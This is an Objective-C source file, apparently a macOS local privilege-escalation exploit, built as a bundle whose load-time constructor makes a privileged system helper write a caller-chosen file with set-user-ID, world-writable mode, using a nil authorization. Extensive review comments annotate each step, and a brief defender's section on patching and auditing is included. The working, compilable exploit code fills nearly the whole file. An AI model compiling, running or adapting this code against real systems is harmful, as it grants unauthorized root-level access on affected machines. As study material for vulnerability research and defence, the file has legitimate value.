// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
#include <dlfcn.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <objc/message.h>
#include <Foundation/Foundation.h>
#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
#define FWK_BASE "/System/Library/Frameworks"
/*
 * Load-time entry point. The constructor attribute makes this function run as
 * soon as the compiled bundle is loaded into a host process, before the host
 * calls anything in it.
 *
 * What the visible code does: it loads the private SystemAdministration
 * framework, fetches WriteConfigClient's shared client and that client's
 * remote proxy, then asks the proxy to create a file at $PAYLOAD_OUT holding
 * the bytes read from $PAYLOAD_IN, with POSIX mode 04777 (set-user-ID bit plus
 * read/write/execute for owner, group and other).
 *
 * NOTE(review): the file is created by whatever answers behind remoteProxy,
 * not by this process. Presumably that is a more privileged helper, in which
 * case the output would be a set-user-ID file owned by the helper's user;
 * the attributes dictionary itself sets only the mode, not the owner. Confirm
 * against the OS release under test.
 *
 * Defender's view: the risk sits in a service that performs a
 * caller-controlled write (contents, path and mode all supplied by the
 * client) without authorizing the caller. Keep the OS patched, audit for
 * set-user-ID files appearing outside the locations the OS ships them in, and
 * watch for processes loading bundles from user-writable paths.
 *
 * No return value; the function always ends the process via exit(1).
 */
void __attribute__ ((constructor)) test(void)
{
    /* RTLD_NOW resolves every symbol at load time. A NULL handle (framework
     * missing or unloadable) skips the whole block below. */
    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);

    if (p != NULL)
    {
        /* Classes and selectors are resolved by name at run time because no
         * header for this private framework is included. If the class is not
         * registered, objc_lookUpClass returns Nil and every message below
         * becomes a silent no-op.
         * NOTE(review): objc_msgSend is called uncast and with extra
         * arguments, which relies on its legacy variadic prototype and on the
         * x86_64 target named in the build line. */
        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
        /* nil is passed as the authorization argument, and the result of this
         * call is discarded, so a failed authentication is not detected. */
        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));

        /* Source and destination paths come from the environment of the host
         * process. Either lookup yields nil when the variable is unset, and
         * dataWithContentsOfFile: yields nil when the read fails; none of the
         * three values is checked before use. */
        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
        NSData* data = [NSData dataWithContentsOfFile:inpath];

        /* @04777 is a boxed octal literal: 04000 is the set-user-ID bit and
         * 0777 grants rwx to owner, group and other. The request's result is
         * not inspected. */
        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
                     data,
                     outpath,
                     @{ NSFilePosixPermissions : @04777 });
    }

    /* Terminates the host process unconditionally, whether or not the
     * framework loaded; status 1 therefore says nothing about whether the
     * file was written. */
    exit(1);
}